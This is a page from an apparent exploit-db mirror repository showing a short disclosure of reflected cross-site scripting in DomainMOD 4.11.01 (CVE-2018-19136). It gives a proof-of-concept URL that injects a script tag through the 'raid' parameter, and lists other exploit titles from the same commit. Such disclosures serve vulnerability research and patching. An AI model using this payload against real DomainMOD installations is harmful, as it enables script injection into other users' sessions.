bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45883.txt
Offensive Security 5643770257 DB: 2018-11-17 
6 changes to exploits/shellcodes

Mumsoft Easy Software 2.0 - Denial of Service (PoC)
Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)

Linux - Broken uid/gid Mapping for Nested User Namespaces

Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
2018-11-17 05:01:40 +00:00

15 lines
No EOL
757 B
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/79
# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php
# page and inject a javascript XSS payload in raid parameter
# POC:
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1
Reference in a new issue View git blame Copy permalink